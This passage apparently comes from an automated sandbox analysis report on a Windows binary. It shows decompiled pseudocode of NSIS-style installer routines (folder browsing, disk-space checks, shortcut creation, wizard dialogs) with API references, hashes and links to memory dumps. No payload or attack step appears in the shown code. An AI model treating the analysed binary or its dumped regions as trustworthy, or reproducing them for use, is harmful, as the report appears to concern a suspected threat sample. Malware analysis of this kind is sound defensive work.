                                                                  								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
                                                                  									E00404545(0x3ff, 0xfffffffb, _t87);
                                                                  									if(_v12 == 0) {
                                                                  										SetDlgItemTextA(_a4, 0x400, 0x79e540);
                                                                  									} else {
                                                                  										E00404545(0x400, 0xfffffffc, _t145);
                                                                  									}
                                                                  								}
                                                                  								_t88 = _v8;
                                                                  								 *0x7a3024 = _t88;
                                                                  								if(_t88 == 0) {
                                                                  									_v8 = E00401410(7);
                                                                  								}
                                                                  								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                                  									_v8 = 0;
                                                                  								}
                                                                  								E00403DC9(0 | _v8 == 0x00000000);
                                                                  								if(_v8 == 0 &&  *0x79f570 == 0) {
                                                                  									E0040417A();
                                                                  								}
                                                                  								 *0x79f570 = 0;
                                                                  								goto L45;
                                                                  							}
                                                                  						}
                                                                  						_t169 = _a8 - 0x405;
                                                                  						if(_a8 != 0x405) {
                                                                  							goto L45;
                                                                  						}
                                                                  						goto L21;
                                                                  					}
                                                                  					_t105 = _a12 & 0x0000ffff;
                                                                  					if(_t105 != 0x3fb) {
                                                                  						L12:
                                                                  						if(_t105 == 0x3e9) {
                                                                  							_t140 = 7;
                                                                  							memset( &_v72, 0, _t140 << 2);
                                                                  							_t144 = 0x79f580;
                                                                  							_v76 = _a4;
                                                                  							_v68 = 0x79f580;
                                                                  							_v56 = E004044DF;
                                                                  							_v52 = _t151;
                                                                  							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
                                                                  							_t110 =  &_v76;
                                                                  							_v60 = 0x41;
                                                                  							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
                                                                  							if(_t110 == 0) {
                                                                  								_a8 = 0x40f;
                                                                  							} else {
                                                                  								E0040521C(0, _t110);
                                                                  								E004054CC(_t151);
                                                                  								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
                                                                  								if(_t114 != 0) {
                                                                  									_push(_t114);
                                                                  									_push(0);
                                                                  									E004059E1(0x3fb, 0x79f580, _t151);
                                                                  									_t144 = 0x7a1f20;
                                                                  									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
                                                                  										lstrcatA(_t151, 0x7a1f20);
                                                                  									}
                                                                  								}
                                                                  								 *0x79f570 =  *0x79f570 + 1;
                                                                  								SetDlgItemTextA(_a4, 0x3fb, _t151);
                                                                  							}
                                                                  						}
                                                                  						goto L19;
                                                                  					}
                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                  						goto L45;
                                                                  					}
                                                                  					_a8 = 0x40f;
                                                                  					goto L12;
                                                                  				} else {
                                                                  					_t144 = GetDlgItem(_a4, 0x3fb);
                                                                  					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
                                                                  						E004054CC(_t151);
                                                                  					}
                                                                  					 *0x7a2758 = _a4;
                                                                  					SetWindowTextA(_t144, _t151);
                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                  					_push(1);
                                                                  					E00403DA7(_a4);
                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                  					_push(0x14);
                                                                  					E00403DA7(_a4);
                                                                  					E00403DDC(_t144);
                                                                  					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
                                                                  					if(_t128 == 0) {
                                                                  						L45:
                                                                  						return E00403E0E(_a8, _a12, _a16);
                                                                  					}
                                                                  					 *_t128(_t144, 1);
                                                                  					goto L8;
                                                                  				}
                                                                  			}




































                                                                  0x004041eb
                                                                  0x004041f2
                                                                  0x004041fe
                                                                  0x0040420c
                                                                  0x00404214
                                                                  0x00404218
                                                                  0x0040421e
                                                                  0x0040421e
                                                                  0x0040422a
                                                                  0x004042a4
                                                                  0x004042ab
                                                                  0x00404377
                                                                  0x0040437e
                                                                  0x0040438d
                                                                  0x0040438d
                                                                  0x00404391
                                                                  0x00404397
                                                                  0x0040439a
                                                                  0x004043a7
                                                                  0x004043a9
                                                                  0x004043a9
                                                                  0x004043b7
                                                                  0x004043bd
                                                                  0x004043c4
                                                                  0x004043c6
                                                                  0x004043c6
                                                                  0x004043d3
                                                                  0x004043df
                                                                  0x00404403
                                                                  0x00404414
                                                                  0x0040441a
                                                                  0x0040441c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404422
                                                                  0x00404422
                                                                  0x00404430
                                                                  0x00000000
                                                                  0x004043e1
                                                                  0x004043e4
                                                                  0x004043e8
                                                                  0x004043ec
                                                                  0x004043ed
                                                                  0x004043f2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004043fa
                                                                  0x00404432
                                                                  0x00404432
                                                                  0x00404439
                                                                  0x00404442
                                                                  0x00404444
                                                                  0x00404444
                                                                  0x00404456
                                                                  0x00404460
                                                                  0x00404468
                                                                  0x0040447e
                                                                  0x0040446a
                                                                  0x0040446e
                                                                  0x0040446e
                                                                  0x00404468
                                                                  0x00404483
                                                                  0x00404488
                                                                  0x0040448d
                                                                  0x00404496
                                                                  0x00404496
                                                                  0x0040449f
                                                                  0x004044a1
                                                                  0x004044a1
                                                                  0x004044ad
                                                                  0x004044b5
                                                                  0x004044bf
                                                                  0x004044bf
                                                                  0x004044c4
                                                                  0x00000000
                                                                  0x004044c4
                                                                  0x004043df
                                                                  0x00404380
                                                                  0x00404387
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404387
                                                                  0x004042b1
                                                                  0x004042b7
                                                                  0x004042d1
                                                                  0x004042d6
                                                                  0x004042e0
                                                                  0x004042e7
                                                                  0x004042ec
                                                                  0x004042f6
                                                                  0x004042f9
                                                                  0x004042fc
                                                                  0x00404303
                                                                  0x0040430b
                                                                  0x0040430e
                                                                  0x00404312
                                                                  0x00404319
                                                                  0x00404321
                                                                  0x00404370
                                                                  0x00404323
                                                                  0x00404324
                                                                  0x0040432a
                                                                  0x00404334
                                                                  0x0040433c
                                                                  0x0040433e
                                                                  0x0040433f
                                                                  0x00404341
                                                                  0x00404347
                                                                  0x00404355
                                                                  0x00404359
                                                                  0x00404359
                                                                  0x00404355
                                                                  0x0040435e
                                                                  0x00404369
                                                                  0x00404369
                                                                  0x00404321
                                                                  0x00000000
                                                                  0x004042d6
                                                                  0x004042c4
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004042ca
                                                                  0x00000000
                                                                  0x0040422c
                                                                  0x00404237
                                                                  0x00404240
                                                                  0x0040424d
                                                                  0x0040424d
                                                                  0x00404257
                                                                  0x0040425c
                                                                  0x00404265
                                                                  0x00404268
                                                                  0x0040426d
                                                                  0x00404275
                                                                  0x00404278
                                                                  0x0040427d
                                                                  0x00404283
                                                                  0x00404292
                                                                  0x00404299
                                                                  0x004044ca
                                                                  0x004044dc
                                                                  0x004044dc
                                                                  0x004042a2
                                                                  0x00000000
                                                                  0x004042a2

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404230
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                  • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                  • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                  • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                  • SetDlgItemTextA.USER32 ref: 00404369
                                                                    • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                    • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                    • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                  • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                  • SetDlgItemTextA.USER32 ref: 0040447E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                  • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                  • API String ID: 2007447535-1909522251
                                                                  • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                  • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                  • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                  • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 74%
                                                                  			E004020A6(void* __eflags) {
                                                                  				void* _t44;
                                                                  				intOrPtr* _t48;
                                                                  				intOrPtr* _t50;
                                                                  				intOrPtr* _t52;
                                                                  				intOrPtr* _t54;
                                                                  				signed int _t58;
                                                                  				intOrPtr* _t59;
                                                                  				intOrPtr* _t62;
                                                                  				intOrPtr* _t64;
                                                                  				intOrPtr* _t66;
                                                                  				intOrPtr* _t69;
                                                                  				intOrPtr* _t71;
                                                                  				int _t75;
                                                                  				signed int _t81;
                                                                  				intOrPtr* _t88;
                                                                  				void* _t95;
                                                                  				void* _t96;
                                                                  				void* _t100;
                                                                  
                                                                  				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                                                  				_t96 = E00402A9A(0xffffffdf);
                                                                  				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                                                  				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                                                  				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                                                  				if(E00405538(_t96) == 0) {
                                                                  					E00402A9A(0x21);
                                                                  				}
                                                                  				_t44 = _t100 + 8;
                                                                  				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                                                  				if(_t44 < _t75) {
                                                                  					L12:
                                                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                  					_push(0xfffffff0);
                                                                  				} else {
                                                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                                                  					if(_t95 >= _t75) {
                                                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
                                                                  						_t81 =  *(_t100 - 0x14);
                                                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                  						if(_t58 != 0) {
                                                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                  							_t81 =  *(_t100 - 0x14);
                                                                  						}
                                                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                  						}
                                                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                  						if(_t95 >= _t75) {
                                                                  							 *0x409418 = _t75;
                                                                  							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                                                  							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                  							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                                                  						}
                                                                  						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                  					}
                                                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                  					if(_t95 >= _t75) {
                                                                  						_push(0xfffffff4);
                                                                  					} else {
                                                                  						goto L12;
                                                                  					}
                                                                  				}
                                                                  				E00401428();
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                                                  				return 0;
                                                                  			}





















                                                                  0x004020af
                                                                  0x004020b9
                                                                  0x004020c2
                                                                  0x004020cc
                                                                  0x004020d5
                                                                  0x004020df
                                                                  0x004020e3
                                                                  0x004020e3
                                                                  0x004020e8
                                                                  0x004020f9
                                                                  0x00402101
                                                                  0x004021df
                                                                  0x004021df
                                                                  0x004021e6
                                                                  0x00402107
                                                                  0x00402107
                                                                  0x00402118
                                                                  0x0040211c
                                                                  0x00402122
                                                                  0x0040212c
                                                                  0x0040212e
                                                                  0x00402139
                                                                  0x0040213c
                                                                  0x00402149
                                                                  0x0040214b
                                                                  0x0040214d
                                                                  0x00402154
                                                                  0x00402157
                                                                  0x00402157
                                                                  0x0040215a
                                                                  0x00402164
                                                                  0x0040216c
                                                                  0x00402171
                                                                  0x0040217d
                                                                  0x0040217d
                                                                  0x00402180
                                                                  0x00402189
                                                                  0x0040218c
                                                                  0x00402195
                                                                  0x0040219a
                                                                  0x004021ac
                                                                  0x004021b5
                                                                  0x004021bb
                                                                  0x004021c7
                                                                  0x004021c7
                                                                  0x004021c9
                                                                  0x004021cf
                                                                  0x004021cf
                                                                  0x004021d2
                                                                  0x004021d8
                                                                  0x004021dd
                                                                  0x004021f2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004021dd
                                                                  0x004021e8
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 123533781-1104044542
                                                                  • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                  • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                                                  • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                                                  • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 39%
                                                                  			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                                                  				void* _t19;
                                                                  
                                                                  				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                  					E0040591D(__edi, _t6);
                                                                  					_push(_t19 - 0x178);
                                                                  					_push(__esi);
                                                                  					E004059BF();
                                                                  				} else {
                                                                  					 *((char*)(__edi)) = __ebx;
                                                                  					 *__esi = __ebx;
                                                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                  				}
                                                                  				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                                                  				return 0;
                                                                  			}




                                                                  0x004026d4
                                                                  0x004026e8
                                                                  0x004026f3
                                                                  0x004026f4
                                                                  0x00402855
                                                                  0x004026d6
                                                                  0x004026d6
                                                                  0x004026d8
                                                                  0x004026da
                                                                  0x004026da
                                                                  0x00402932
                                                                  0x0040293e

                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: FileFindFirst
                                                                  • String ID:
                                                                  • API String ID: 1974802433-0
                                                                  • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                  • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                                                  • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                                                  • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341529423.0000000002640000.00000040.00000001.sdmp, Offset: 02640000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                  • Instruction ID: f1aa2ac1b8a8be01aea265680f6219c5c42ce2953335f28997d70b2d7beabd00
                                                                  • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                  • Instruction Fuzzy Hash: 29014C78A11208EFCB40DF98C58099DBBF5EB09220B1085E5E858E7711E730AE50DF40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341529423.0000000002640000.00000040.00000001.sdmp, Offset: 02640000, based on PE: false
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                  • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                  • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                  • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                  				void* _v84;
                                                                  				void* _v88;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t33;
                                                                  				signed int _t35;
                                                                  				struct HWND__* _t37;
                                                                  				struct HWND__* _t47;
                                                                  				struct HWND__* _t65;
                                                                  				struct HWND__* _t71;
                                                                  				struct HWND__* _t84;
                                                                  				struct HWND__* _t89;
                                                                  				struct HWND__* _t97;
                                                                  				int _t101;
                                                                  				int _t104;
                                                                  				struct HWND__* _t117;
                                                                  				struct HWND__* _t120;
                                                                  				signed int _t122;
                                                                  				struct HWND__* _t127;
                                                                  				long _t132;
                                                                  				int _t134;
                                                                  				int _t135;
                                                                  				struct HWND__* _t136;
                                                                  				void* _t139;
                                                                  
                                                                  				_t135 = _a8;
                                                                  				if(_t135 == 0x110 || _t135 == 0x408) {
                                                                  					_t33 = _a12;
                                                                  					_t117 = _a4;
                                                                  					__eflags = _t135 - 0x110;
                                                                  					 *0x79f56c = _t33;
                                                                  					if(_t135 == 0x110) {
                                                                  						 *0x7a2f84 = _t117;
                                                                  						 *0x79f57c = GetDlgItem(_t117, 1);
                                                                  						_t89 = GetDlgItem(_t117, 2);
                                                                  						_push(0xffffffff);
                                                                  						_push(0x1c);
                                                                  						 *0x79e548 = _t89;
                                                                  						E00403DA7(_t117);
                                                                  						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
                                                                  						 *0x7a274c = E00401410(4);
                                                                  						_t33 = 1;
                                                                  						__eflags = 1;
                                                                  						 *0x79f56c = 1;
                                                                  					}
                                                                  					_t120 =  *0x409284; // 0xffffffff
                                                                  					_t132 = (_t120 << 6) +  *0x7a2fa0;
                                                                  					__eflags = _t120;
                                                                  					if(_t120 < 0) {
                                                                  						L38:
                                                                  						E00403DF3(0x40b);
                                                                  						while(1) {
                                                                  							_t35 =  *0x79f56c;
                                                                  							 *0x409284 =  *0x409284 + _t35;
                                                                  							_t132 = _t132 + (_t35 << 6);
                                                                  							_t37 =  *0x409284; // 0xffffffff
                                                                  							__eflags = _t37 -  *0x7a2fa4;
                                                                  							if(_t37 ==  *0x7a2fa4) {
                                                                  								E00401410(1);
                                                                  							}
                                                                  							__eflags =  *0x7a274c;
                                                                  							if( *0x7a274c != 0) {
                                                                  								break;
                                                                  							}
                                                                  							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                                                  							if(__eflags >= 0) {
                                                                  								break;
                                                                  							}
                                                                  							_push( *((intOrPtr*)(_t132 + 0x24)));
                                                                  							_t122 =  *(_t132 + 0x14);
                                                                  							_push(0x7ab000);
                                                                  							E004059E1(_t117, _t122, _t132);
                                                                  							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                                  							_push(0xfffffc19);
                                                                  							E00403DA7(_t117);
                                                                  							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                                  							_push(0xfffffc1b);
                                                                  							E00403DA7(_t117);
                                                                  							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                                  							_push(0xfffffc1a);
                                                                  							E00403DA7(_t117);
                                                                  							_t47 = GetDlgItem(_t117, 3);
                                                                  							__eflags =  *0x7a300c;
                                                                  							_t136 = _t47;
                                                                  							if( *0x7a300c != 0) {
                                                                  								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                                                  								__eflags = _t122;
                                                                  							}
                                                                  							ShowWindow(_t136, _t122 & 0x00000008);
                                                                  							EnableWindow(_t136, _t122 & 0x00000100);
                                                                  							E00403DC9(_t122 & 0x00000002);
                                                                  							EnableWindow( *0x79e548, _t122 & 0x00000004);
                                                                  							SendMessageA(_t136, 0xf4, 0, 1);
                                                                  							__eflags =  *0x7a300c;
                                                                  							if( *0x7a300c == 0) {
                                                                  								_push( *0x79f57c);
                                                                  							} else {
                                                                  								SendMessageA(_t117, 0x401, 2, 0);
                                                                  								_push( *0x79e548);
                                                                  							}
                                                                  							E00403DDC();
                                                                  							E004059BF(0x79f580, 0x7a2780);
                                                                  							_push( *((intOrPtr*)(_t132 + 0x18)));
                                                                  							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                                                  							E004059E1(_t117, 0, _t132);
                                                                  							SetWindowTextA(_t117, 0x79f580);
                                                                  							_push(0);
                                                                  							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                                                  							__eflags = _t65;
                                                                  							if(_t65 != 0) {
                                                                  								continue;
                                                                  							} else {
                                                                  								__eflags =  *_t132 - _t65;
                                                                  								if( *_t132 == _t65) {
                                                                  									continue;
                                                                  								}
                                                                  								__eflags =  *(_t132 + 4) - 5;
                                                                  								if( *(_t132 + 4) != 5) {
                                                                  									DestroyWindow( *0x7a2758);
                                                                  									 *0x79ed58 = _t132;
                                                                  									__eflags =  *_t132;
                                                                  									if( *_t132 > 0) {
                                                                  										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
                                                                  										__eflags = _t71;
                                                                  										 *0x7a2758 = _t71;
                                                                  										if(_t71 != 0) {
                                                                  											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                                  											_push(6);
                                                                  											E00403DA7(_t71);
                                                                  											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
                                                                  											ScreenToClient(_t117, _t139 + 0x10);
                                                                  											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
                                                                  											_push(0);
                                                                  											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                                                  											ShowWindow( *0x7a2758, 8);
                                                                  											E00403DF3(0x405);
                                                                  										}
                                                                  									}
                                                                  									goto L58;
                                                                  								}
                                                                  								__eflags =  *0x7a300c - _t65;
                                                                  								if( *0x7a300c != _t65) {
                                                                  									goto L61;
                                                                  								}
                                                                  								__eflags =  *0x7a3000 - _t65;
                                                                  								if( *0x7a3000 != _t65) {
                                                                  									continue;
                                                                  								}
                                                                  								goto L61;
                                                                  							}
                                                                  						}
                                                                  						DestroyWindow( *0x7a2758);
                                                                  						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                                                  						__eflags =  *0x7a2f84;
                                                                  						EndDialog(_t117,  *0x79e950);
                                                                  						goto L58;
                                                                  					} else {
                                                                  						__eflags = _t33 - 1;
                                                                  						if(_t33 != 1) {
                                                                  							L37:
                                                                  							__eflags =  *_t132;
                                                                  							if( *_t132 == 0) {
                                                                  								goto L61;
                                                                  							}
                                                                  							goto L38;
                                                                  						}
                                                                  						_push(0);
                                                                  						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                                                  						__eflags = _t84;
                                                                  						if(_t84 == 0) {
                                                                  							goto L37;
                                                                  						}
                                                                  						SendMessageA( *0x7a2758, 0x40f, 0, 1);
